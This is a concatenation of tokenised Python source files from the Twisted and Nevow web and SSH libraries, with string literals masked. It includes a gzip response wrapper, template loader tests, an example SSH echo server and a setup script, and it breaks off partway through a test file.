"""<STR_LIT>""" <EOL> d = { } <EOL> for iface in [ IRequest , IConsumer ] : <EOL> for attrName in iface . names ( all = True ) : <EOL> d [ attrName ] = _ProxyDescriptor ( attrName ) <EOL> return type ( '<STR_LIT>' , ( object , ) , d ) <EOL> class CompressingRequestWrapper ( _makeBase ( ) ) : <EOL> """<STR_LIT>""" <EOL> implements ( IRequest ) <EOL> encoding = '<STR_LIT>' <EOL> compressLevel = <NUM_LIT:6> <EOL> def __init__ ( self , underlying ) : <EOL> self . underlying = underlying <EOL> self . setHeader ( '<STR_LIT>' , self . encoding ) <EOL> self . _gzipFile = None <EOL> self . underlying . responseHeaders . removeHeader ( '<STR_LIT>' ) <EOL> def setHeader ( self , name , value ) : <EOL> """<STR_LIT>""" <EOL> if name . lower ( ) == '<STR_LIT>' : <EOL> return <EOL> else : <EOL> return self . underlying . setHeader ( name , value ) <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> if self . _gzipFile is None : <EOL> self . _gzipFile = GzipFile ( fileobj = self . underlying , mode = '<STR_LIT:wb>' , compresslevel = self . compressLevel ) <EOL> self . _gzipFile . write ( data ) <EOL> def finishRequest ( self , success ) : <EOL> """<STR_LIT>""" <EOL> if self . _gzipFile is None : <EOL> self . write ( '<STR_LIT>' ) <EOL> self . _gzipFile . close ( ) <EOL> self . underlying . finishRequest ( success ) <EOL> class CompressingResourceWrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( IResource ) <EOL> def __init__ ( self , underlying ) : <EOL> self . underlying = underlying <EOL> def canCompress ( self , req ) : <EOL> """<STR_LIT>""" <EOL> value = req . getHeader ( '<STR_LIT>' ) <EOL> if value is not None : <EOL> encodings = parseAcceptEncoding ( value ) <EOL> return encodings . get ( '<STR_LIT>' , <NUM_LIT:0.0> ) > <NUM_LIT:0.0> <EOL> return False <EOL> def renderHTTP ( self , ctx ) : <EOL> """<STR_LIT>""" <EOL> req = IRequest ( ctx ) <EOL> if not self . canCompress ( req ) : <EOL> return self . underlying . renderHTTP ( ctx ) <EOL> req = CompressingRequestWrapper ( req ) <EOL> ctx . remember ( req , IRequest ) <EOL> def _cbDoneRendering ( html ) : <EOL> if isinstance ( html , str ) : <EOL> req . write ( html ) <EOL> req . finishRequest ( True ) <EOL> return errorMarker <EOL> return html <EOL> return maybeDeferred ( self . underlying . renderHTTP , ctx ) . addCallback ( _cbDoneRendering ) <EOL> def locateChild ( self , ctx , segments ) : <EOL> """<STR_LIT>""" <EOL> def _cbWrapChild ( result ) : <EOL> if result in [ NotFound , errorMarker ] : <EOL> return result <EOL> if isinstance ( result , tuple ) : <EOL> res , segments = result <EOL> if isinstance ( res , Deferred ) : <EOL> return res . addCallback ( lambda res : _cbWrapChild ( ( res , segments ) ) ) <EOL> return type ( self ) ( IResource ( res ) ) , segments <EOL> raise ValueError ( '<STR_LIT>' % ( result , ) ) <EOL> return maybeDeferred ( self . underlying . locateChild , ctx , segments ) . addCallback ( _cbWrapChild ) </s>
<s> from xml . dom import pulldom <EOL> from cStringIO import StringIO <EOL> from twisted . python import usage <EOL> import nevow <EOL> class LineBasedStream ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream ) : <EOL> self . stream = stream <EOL> self . buffer = '<STR_LIT>' <EOL> def read ( self , bufsize ) : <EOL> if not self . buffer : <EOL> self . buffer = self . stream . readline ( bufsize ) <EOL> if not self . buffer : <EOL> return '<STR_LIT>' <EOL> data , self . buffer = self . buffer , '<STR_LIT>' <EOL> while data . endswith ( '<STR_LIT:\n>' ) : <EOL> self . buffer = self . buffer + data [ - <NUM_LIT:1> ] <EOL> data = data [ : - <NUM_LIT:1> ] <EOL> if not data : <EOL> data , self . buffer = self . buffer , '<STR_LIT>' <EOL> return data <EOL> def getMsgID ( node ) : <EOL> out = StringIO ( ) <EOL> print >> out , '<STR_LIT>' <EOL> for child in node . childNodes : <EOL> s = child . toxml ( '<STR_LIT:utf-8>' ) <EOL> s = s . replace ( '<STR_LIT:\\>' , '<STR_LIT>' ) <EOL> s = s . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> s = s . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> print >> out , '<STR_LIT>' % s <EOL> print >> out , '<STR_LIT>' <EOL> return out . getvalue ( ) <EOL> def process ( filename , messages ) : <EOL> f = open ( filename , '<STR_LIT>' ) <EOL> stream = LineBasedStream ( f ) <EOL> events = pulldom . parse ( stream ) <EOL> for ( event , node ) in events : <EOL> if event == pulldom . START_ELEMENT : <EOL> get = getattr ( node , '<STR_LIT>' , None ) <EOL> if get is not None : <EOL> value = get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if value == '<STR_LIT>' : <EOL> events . expandNode ( node ) <EOL> msgid = getMsgID ( node ) <EOL> l = messages . setdefault ( msgid , [ ] ) <EOL> l . append ( '<STR_LIT>' % ( filename , events . parser . getLineNumber ( ) ) ) <EOL> def report ( messages ) : <EOL> for msgid , locations in messages . items ( ) : <EOL> for line in locations : <EOL> print line <EOL> print msgid <EOL> class GettextOptions ( usage . Options ) : <EOL> def opt_version ( self ) : <EOL> print '<STR_LIT>' , nevow . __version__ <EOL> usage . Options . opt_version ( self ) <EOL> def parseArgs ( self , * files ) : <EOL> self [ '<STR_LIT>' ] = files <EOL> def runApp ( config ) : <EOL> messages = { } <EOL> for filename in config [ '<STR_LIT>' ] : <EOL> process ( filename , messages ) <EOL> report ( messages ) <EOL> def run ( ) : <EOL> from twisted . application import app <EOL> app . run ( runApp , GettextOptions ) </s>
<s> import os <EOL> from twisted . trial import unittest , util <EOL> from nevow import context <EOL> from nevow import flat <EOL> from nevow . flat . flatstan import _PrecompiledSlot <EOL> from nevow import loaders <EOL> from nevow import tags as t <EOL> class TestDocFactories ( unittest . TestCase ) : <EOL> def _preprocessorTest ( self , docFactory ) : <EOL> def preprocessor ( uncompiled ) : <EOL> self . assertEquals ( len ( uncompiled ) , <NUM_LIT:1> ) <EOL> uncompiled = uncompiled [ <NUM_LIT:0> ] <EOL> self . assertEquals ( uncompiled . tagName , '<STR_LIT>' ) <EOL> self . assertEquals ( len ( uncompiled . children ) , <NUM_LIT:2> ) <EOL> self . assertEquals ( uncompiled . children [ <NUM_LIT:0> ] . tagName , '<STR_LIT>' ) <EOL> self . assertEquals ( uncompiled . children [ <NUM_LIT:0> ] . children , [ '<STR_LIT>' ] ) <EOL> self . assertEquals ( uncompiled . children [ <NUM_LIT:1> ] . tagName , '<STR_LIT>' ) <EOL> self . assertEquals ( uncompiled . children [ <NUM_LIT:1> ] . children , [ '<STR_LIT>' ] ) <EOL> return t . div [ '<STR_LIT>' ] <EOL> doc = docFactory . load ( preprocessors = [ preprocessor ] ) <EOL> self . assertEquals ( doc , [ '<STR_LIT>' ] ) <EOL> def test_stanPreprocessors ( self ) : <EOL> """<STR_LIT>""" <EOL> factory = loaders . stan ( <EOL> t . div [ t . span [ '<STR_LIT>' ] , t . span [ '<STR_LIT>' ] ] ) <EOL> return self . _preprocessorTest ( factory ) <EOL> def test_stan ( self ) : <EOL> doc = t . ul ( id = '<STR_LIT>' ) [ t . li [ '<STR_LIT>' ] , t . li [ '<STR_LIT>' ] , t . li [ '<STR_LIT>' ] ] <EOL> df = loaders . stan ( doc ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> def test_stanPrecompiled ( self ) : <EOL> """<STR_LIT>""" <EOL> doc = flat . precompile ( t . ul ( id = '<STR_LIT>' ) [ t . li [ '<STR_LIT>' ] , t . li [ '<STR_LIT>' ] , t . slot ( '<STR_LIT>' ) ] ) <EOL> df = loaders . stan ( doc ) <EOL> loaded = df . load ( ) <EOL> self . assertEqual ( loaded [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . failUnless ( isinstance ( loaded [ <NUM_LIT:1> ] , _PrecompiledSlot ) ) <EOL> self . assertEqual ( loaded [ <NUM_LIT:1> ] . name , '<STR_LIT>' ) <EOL> self . assertEqual ( loaded [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> def test_htmlstr ( self ) : <EOL> doc = '<STR_LIT>' <EOL> df = loaders . htmlstr ( doc ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] , doc ) <EOL> test_htmlstr . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_htmlfile ( self ) : <EOL> doc = '<STR_LIT>' <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( doc ) <EOL> f . close ( ) <EOL> df = loaders . htmlfile ( temp ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] , doc ) <EOL> test_htmlfile . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_htmlfile_slots ( self ) : <EOL> doc = '<STR_LIT>' <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( doc ) <EOL> f . close ( ) <EOL> df = loaders . htmlfile ( temp ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] . children , [ '<STR_LIT>' ] ) <EOL> test_htmlfile_slots . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_xmlstr ( self ) : <EOL> doc = '<STR_LIT>' <EOL> df = loaders . xmlstr ( doc ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] , doc ) <EOL> def test_xmlstrPreprocessors ( self ) : <EOL> """<STR_LIT>""" <EOL> factory = loaders . xmlstr ( <EOL> '<STR_LIT>' ) <EOL> return self . _preprocessorTest ( factory ) <EOL> def test_xmlfile ( self ) : <EOL> doc = '<STR_LIT>' <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( doc ) <EOL> f . close ( ) <EOL> df = loaders . xmlfile ( temp ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] , doc ) <EOL> def test_xmlfilePreprocessors ( self ) : <EOL> """<STR_LIT>""" <EOL> xmlFile = self . mktemp ( ) <EOL> f = file ( xmlFile , '<STR_LIT:w>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . close ( ) <EOL> factory = loaders . xmlfile ( xmlFile ) <EOL> return self . _preprocessorTest ( factory ) <EOL> def test_patterned ( self ) : <EOL> """<STR_LIT>""" <EOL> doc = t . div [ t . p [ t . span ( pattern = '<STR_LIT>' ) [ '<STR_LIT>' ] ] ] <EOL> df = loaders . stan ( doc , pattern = '<STR_LIT>' ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] . tagName , '<STR_LIT>' ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] . children [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> def test_ignoreDocType ( self ) : <EOL> doc = '''<STR_LIT>''' <EOL> df = loaders . xmlstr ( doc , ignoreDocType = True ) <EOL> self . assertEquals ( flat . flatten ( df ) , '<STR_LIT>' ) <EOL> def test_ignoreComment ( self ) : <EOL> doc = '<STR_LIT>' <EOL> df = loaders . xmlstr ( doc , ignoreComment = True ) <EOL> self . assertEquals ( flat . flatten ( df ) , '<STR_LIT>' ) <EOL> class TestDocFactoriesCache ( unittest . TestCase ) : <EOL> doc = '''<STR_LIT>''' <EOL> nsdoc = '''<STR_LIT>''' <EOL> stan = t . div [ t . p ( pattern = '<STR_LIT:1>' ) [ '<STR_LIT>' ] , t . p ( pattern = '<STR_LIT:2>' ) [ '<STR_LIT>' ] ] <EOL> def test_stan ( self ) : <EOL> loader = loaders . stan ( self . stan ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> loader = loaders . stan ( self . stan , pattern = '<STR_LIT:1>' ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> l1 = loaders . stan ( self . stan , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . stan ( self . stan , pattern = '<STR_LIT:1>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> l1 = loaders . stan ( self . stan , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . stan ( self . stan , pattern = '<STR_LIT:2>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> def test_htmlstr ( self ) : <EOL> loader = loaders . htmlstr ( self . doc ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> loader = loaders . htmlstr ( self . doc , pattern = '<STR_LIT:1>' ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> l1 = loaders . htmlstr ( self . doc , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . htmlstr ( self . doc , pattern = '<STR_LIT:1>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> l1 = loaders . htmlstr ( self . doc , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . htmlstr ( self . doc , pattern = '<STR_LIT:2>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> test_htmlstr . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_htmlfile ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( self . doc ) <EOL> f . close ( ) <EOL> loader = loaders . htmlfile ( temp ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> l1 = loaders . htmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . htmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> l1 = loaders . htmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . htmlfile ( temp , pattern = '<STR_LIT:2>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> test_htmlfile . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_htmlfileReload ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( self . doc ) <EOL> f . close ( ) <EOL> loader = loaders . htmlfile ( temp ) <EOL> r = loader . load ( ) <EOL> self . assertEquals ( id ( r ) , id ( loader . load ( ) ) ) <EOL> os . utime ( temp , ( os . path . getatime ( temp ) , os . path . getmtime ( temp ) + <NUM_LIT:5> ) ) <EOL> self . assertNotEqual ( id ( r ) , id ( loader . load ( ) ) ) <EOL> test_htmlfileReload . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_xmlstr ( self ) : <EOL> loader = loaders . xmlstr ( self . nsdoc ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> loader = loaders . xmlstr ( self . nsdoc , pattern = '<STR_LIT:1>' ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> l1 = loaders . xmlstr ( self . nsdoc , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . xmlstr ( self . nsdoc , pattern = '<STR_LIT:1>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> l1 = loaders . xmlstr ( self . nsdoc , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . xmlstr ( self . nsdoc , pattern = '<STR_LIT:2>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> def test_xmlSlotDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> slotsdoc = '''<STR_LIT>''' <EOL> loader = loaders . xmlstr ( slotsdoc ) <EOL> loaded = loader . load ( ) <EOL> self . assertEquals ( loaded [ <NUM_LIT:1> ] . default , None ) <EOL> self . assertEquals ( loaded [ <NUM_LIT:3> ] . default , "<STR_LIT:3>" ) <EOL> def test_xmlfile ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( self . nsdoc ) <EOL> f . close ( ) <EOL> loader = loaders . xmlfile ( temp ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> loader = loaders . xmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> l1 = loaders . xmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . xmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> l1 = loaders . xmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . xmlfile ( temp , pattern = '<STR_LIT:2>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> def test_xmlfileReload ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( self . nsdoc ) <EOL> f . close ( ) <EOL> loader = loaders . xmlfile ( temp ) <EOL> r = loader . load ( ) <EOL> self . assertEquals ( id ( r ) , id ( loader . load ( ) ) ) <EOL> os . utime ( temp , ( os . path . getatime ( temp ) , os . path . getmtime ( temp ) + <NUM_LIT:5> ) ) <EOL> self . assertNotEqual ( id ( r ) , id ( loader . load ( ) ) ) <EOL> def test_reloadAfterPrecompile ( self ) : <EOL> """<STR_LIT:U+0020>""" <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . close ( ) <EOL> ctx = context . WovenContext ( ) <EOL> doc = loaders . htmlfile ( temp ) <EOL> pc = flat . precompile ( flat . flatten ( doc ) , ctx ) <EOL> before = '<STR_LIT>' . join ( flat . serialize ( pc , ctx ) ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . close ( ) <EOL> os . utime ( temp , ( os . path . getatime ( temp ) , os . path . getmtime ( temp ) + <NUM_LIT:5> ) ) <EOL> after = '<STR_LIT>' . join ( flat . serialize ( pc , ctx ) ) <EOL> self . assertIn ( '<STR_LIT:foo>' , before ) <EOL> self . assertIn ( '<STR_LIT:bar>' , after ) <EOL> self . failIfEqual ( before , after ) <EOL> test_reloadAfterPrecompile . todo = '<STR_LIT>' '<STR_LIT>' <EOL> class TestContext ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_stan ( self ) : <EOL> doc = t . p [ '<STR_LIT:hello>' ] <EOL> self . _withAndWithout ( loaders . stan ( doc ) ) <EOL> def test_xmlstr ( self ) : <EOL> doc = '<STR_LIT>' <EOL> self . _withAndWithout ( loaders . xmlstr ( doc ) ) <EOL> def test_xmlfile ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . close ( ) <EOL> self . _withAndWithout ( loaders . xmlfile ( temp ) ) <EOL> def test_htmlstr ( self ) : <EOL> doc = '<STR_LIT>' <EOL> self . _withAndWithout ( loaders . htmlstr ( doc ) ) <EOL> test_htmlstr . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_htmlfile ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . close ( ) <EOL> self . _withAndWithout ( loaders . htmlfile ( temp ) ) <EOL> test_htmlfile . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def _withAndWithout ( self , loader ) : <EOL> ctx = context . WovenContext ( ) <EOL> self . assertEquals ( loader . load ( ) , [ '<STR_LIT>' ] ) <EOL> self . assertEquals ( loader . load ( ctx ) , [ '<STR_LIT>' ] ) <EOL> class TestParsing ( unittest . TestCase ) : <EOL> def test_missingSpace ( self ) : <EOL> doc = '<STR_LIT>' <EOL> result = loaders . xmlstr ( doc ) . load ( ) <EOL> self . assertEquals ( result [ <NUM_LIT:2> ] , '<STR_LIT:U+0020>' ) </s>
<s> from twisted . internet . task import react <EOL> from _utils import print_response <EOL> import treq <EOL> def main ( reactor , * args ) : <EOL> d = treq . get ( '<STR_LIT>' , allow_redirects = False ) <EOL> d . addCallback ( print_response ) <EOL> return d <EOL> react ( main , [ ] ) </s>
<s> from twisted . cred import portal <EOL> from twisted . cred . checkers import InMemoryUsernamePasswordDatabaseDontUse <EOL> from twisted . conch import avatar <EOL> from twisted . conch . checkers import SSHPublicKeyChecker , InMemorySSHKeyDB <EOL> from twisted . conch . ssh import factory , userauth , connection , keys , session <EOL> from twisted . conch . ssh . transport import SSHServerTransport <EOL> from twisted . internet import reactor , protocol <EOL> from twisted . python import log <EOL> from twisted . python import components <EOL> from zope . interface import implements <EOL> import sys <EOL> log . startLogging ( sys . stderr ) <EOL> """<STR_LIT>""" <EOL> SERVER_RSA_PRIVATE = '<STR_LIT>' <EOL> SERVER_RSA_PUBLIC = '<STR_LIT>' <EOL> CLIENT_RSA_PUBLIC = '<STR_LIT>' <EOL> PRIMES = { <EOL> <NUM_LIT> : [ ( <NUM_LIT:2> L , <NUM_LIT> L ) ] , <EOL> <NUM_LIT> : [ ( <NUM_LIT:2> L , <NUM_LIT> L ) ] , <EOL> } <EOL> class ExampleAvatar ( avatar . ConchUser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , username ) : <EOL> avatar . ConchUser . __init__ ( self ) <EOL> self . username = username <EOL> self . channelLookup . update ( { '<STR_LIT>' : session . SSHSession } ) <EOL> class ExampleRealm ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( portal . IRealm ) <EOL> def requestAvatar ( self , avatarId , mind , * interfaces ) : <EOL> """<STR_LIT>""" <EOL> return interfaces [ <NUM_LIT:0> ] , ExampleAvatar ( avatarId ) , lambda : None <EOL> class EchoProtocol ( protocol . Protocol ) : <EOL> """<STR_LIT>""" <EOL> def dataReceived ( self , data ) : <EOL> """<STR_LIT>""" <EOL> if data == '<STR_LIT:\r>' : <EOL> data = '<STR_LIT:\r\n>' <EOL> elif data == '<STR_LIT>' : <EOL> self . transport . loseConnection ( ) <EOL> return <EOL> self . transport . write ( data ) <EOL> class ExampleSession ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , avatar ) : <EOL> """<STR_LIT>""" <EOL> def getPty ( self , term , windowSize , attrs ) : <EOL> """<STR_LIT>""" <EOL> def execCommand ( self , proto , cmd ) : <EOL> """<STR_LIT>""" <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def openShell ( self , transport ) : <EOL> """<STR_LIT>""" <EOL> protocol = EchoProtocol ( ) <EOL> protocol . makeConnection ( transport ) <EOL> transport . makeConnection ( session . wrapProtocol ( protocol ) ) <EOL> def eofReceived ( self ) : <EOL> pass <EOL> def closed ( self ) : <EOL> pass <EOL> components . registerAdapter ( ExampleSession , ExampleAvatar , session . ISession ) <EOL> class ExampleFactory ( factory . SSHFactory ) : <EOL> """<STR_LIT>""" <EOL> protocol = SSHServerTransport <EOL> publicKeys = { <EOL> '<STR_LIT>' : keys . Key . fromFile ( SERVER_RSA_PUBLIC ) <EOL> } <EOL> privateKeys = { <EOL> '<STR_LIT>' : keys . Key . fromFile ( SERVER_RSA_PRIVATE ) <EOL> } <EOL> services = { <EOL> '<STR_LIT>' : userauth . SSHUserAuthServer , <EOL> '<STR_LIT>' : connection . SSHConnection <EOL> } <EOL> def getPrimes ( self ) : <EOL> """<STR_LIT>""" <EOL> return PRIMES <EOL> portal = portal . Portal ( ExampleRealm ( ) ) <EOL> passwdDB = InMemoryUsernamePasswordDatabaseDontUse ( ) <EOL> passwdDB . addUser ( '<STR_LIT:user>' , '<STR_LIT:password>' ) <EOL> sshDB = SSHPublicKeyChecker ( InMemorySSHKeyDB ( <EOL> { '<STR_LIT:user>' : [ keys . Key . fromFile ( CLIENT_RSA_PUBLIC ) ] } ) ) <EOL> portal . registerChecker ( passwdDB ) <EOL> portal . registerChecker ( sshDB ) <EOL> ExampleFactory . portal = portal <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> reactor . listenTCP ( <NUM_LIT> , ExampleFactory ( ) ) <EOL> reactor . run ( ) </s>
<s> from __future__ import division , absolute_import <EOL> import sys <EOL> import os <EOL> from setuptools import setup , find_packages <EOL> from setuptools . command . build_py import build_py <EOL> from distutils . command . build_scripts import build_scripts <EOL> class PickyBuildPy ( build_py ) : <EOL> """<STR_LIT>""" <EOL> def find_package_modules ( self , package , package_dir ) : <EOL> from twisted . python . dist3 import modulesToInstall , testDataFiles <EOL> modules = [ <EOL> module for module <EOL> in super ( build_py , self ) . find_package_modules ( package , package_dir ) <EOL> if "<STR_LIT:.>" . join ( [ module [ <NUM_LIT:0> ] , module [ <NUM_LIT:1> ] ] ) in modulesToInstall or <EOL> "<STR_LIT:.>" . join ( [ module [ <NUM_LIT:0> ] , module [ <NUM_LIT:1> ] ] ) in testDataFiles ] <EOL> return modules <EOL> class PickyBuildScripts ( build_scripts ) : <EOL> """<STR_LIT>""" <EOL> def copy_scripts ( self ) : <EOL> from twisted . python . dist3 import portedScripts <EOL> self . scripts = portedScripts <EOL> return super ( PickyBuildScripts , self ) . copy_scripts ( ) <EOL> def main ( ) : <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT:.>' ) <EOL> from twisted . python . dist import STATIC_PACKAGE_METADATA , getScripts <EOL> args = STATIC_PACKAGE_METADATA . copy ( ) <EOL> args . update ( dict ( <EOL> cmdclass = { <EOL> '<STR_LIT>' : PickyBuildPy , <EOL> '<STR_LIT>' : PickyBuildScripts , <EOL> } , <EOL> packages = find_packages ( ) , <EOL> install_requires = [ "<STR_LIT>" ] , <EOL> zip_safe = False , <EOL> include_package_data = True , <EOL> scripts = getScripts ( ) , <EOL> ) ) <EOL> setup ( ** args ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os , errno <EOL> from twisted . python import log <EOL> from twisted . python . util import runAsEffectiveUser <EOL> from twisted . conch . ssh import keys , factory , common <EOL> from twisted . conch . openssh_compat import primes <EOL> class OpenSSHFactory ( factory . SSHFactory ) : <EOL> dataRoot = '<STR_LIT>' <EOL> moduliRoot = '<STR_LIT>' <EOL> def getPublicKeys ( self ) : <EOL> """<STR_LIT>""" <EOL> ks = { } <EOL> for filename in os . listdir ( self . dataRoot ) : <EOL> if filename [ : <NUM_LIT:9> ] == '<STR_LIT>' and filename [ - <NUM_LIT:8> : ] == '<STR_LIT>' : <EOL> try : <EOL> k = keys . Key . fromFile ( <EOL> os . path . join ( self . dataRoot , filename ) ) <EOL> t = common . getNS ( k . blob ( ) ) [ <NUM_LIT:0> ] <EOL> ks [ t ] = k <EOL> except Exception as e : <EOL> log . msg ( '<STR_LIT>' % ( filename , e ) ) <EOL> return ks <EOL> def getPrivateKeys ( self ) : <EOL> """<STR_LIT>""" <EOL> privateKeys = { } <EOL> for filename in os . listdir ( self . dataRoot ) : <EOL> if filename [ : <NUM_LIT:9> ] == '<STR_LIT>' and filename [ - <NUM_LIT:4> : ] == '<STR_LIT>' : <EOL> fullPath = os . path . join ( self . dataRoot , filename ) <EOL> try : <EOL> key = keys . Key . fromFile ( fullPath ) <EOL> except IOError as e : <EOL> if e . errno == errno . EACCES : <EOL> key = runAsEffectiveUser ( <EOL> <NUM_LIT:0> , <NUM_LIT:0> , keys . Key . fromFile , fullPath ) <EOL> privateKeys [ key . sshType ( ) ] = key <EOL> else : <EOL> raise <EOL> except Exception as e : <EOL> log . msg ( '<STR_LIT>' % ( filename , e ) ) <EOL> else : <EOL> privateKeys [ key . sshType ( ) ] = key <EOL> return privateKeys <EOL> def getPrimes ( self ) : <EOL> try : <EOL> return primes . parseModuliFile ( self . moduliRoot + '<STR_LIT>' ) <EOL> except IOError : <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> import traceback <EOL> from twisted . trial import unittest <EOL> from twisted . internet import error , defer <EOL> from twisted . test . proto_helpers import StringTransport <EOL> from twisted . conch . test . test_recvline import ( <EOL> _TelnetMixin , _SSHMixin , _StdioMixin , stdio , ssh ) <EOL> from twisted . conch import manhole <EOL> from twisted . conch . insults import insults <EOL> def determineDefaultFunctionName ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> <NUM_LIT:1> // <NUM_LIT:0> <EOL> except : <EOL> return traceback . extract_stack ( ) [ - <NUM_LIT:2> ] [ <NUM_LIT:2> ] <EOL> defaultFunctionName = determineDefaultFunctionName ( ) <EOL> class ManholeInterpreterTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_resetBuffer ( self ) : <EOL> """<STR_LIT>""" <EOL> interpreter = manhole . ManholeInterpreter ( None ) <EOL> interpreter . buffer . extend ( [ "<STR_LIT:1>" , "<STR_LIT:2>" ] ) <EOL> interpreter . resetBuffer ( ) 